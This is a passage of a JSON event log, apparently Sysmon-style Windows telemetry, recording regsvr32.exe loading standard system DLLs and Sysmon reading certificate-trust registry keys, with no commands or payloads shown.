"C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235580000, - "unique_pid": 
"{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\System32\\apphelp.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 3596, - "process_name": 
"regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 3596, - 
"process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\System32\\propsys.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": 
"C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": 
"CTLs", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573235890000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "AcLayers.dll", - "image_path": "C:\\Windows\\System32\\AcLayers.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "uxtheme.dll", - "image_path": "C:\\Windows\\System32\\uxtheme.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
- "registry_value": "Certificates", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
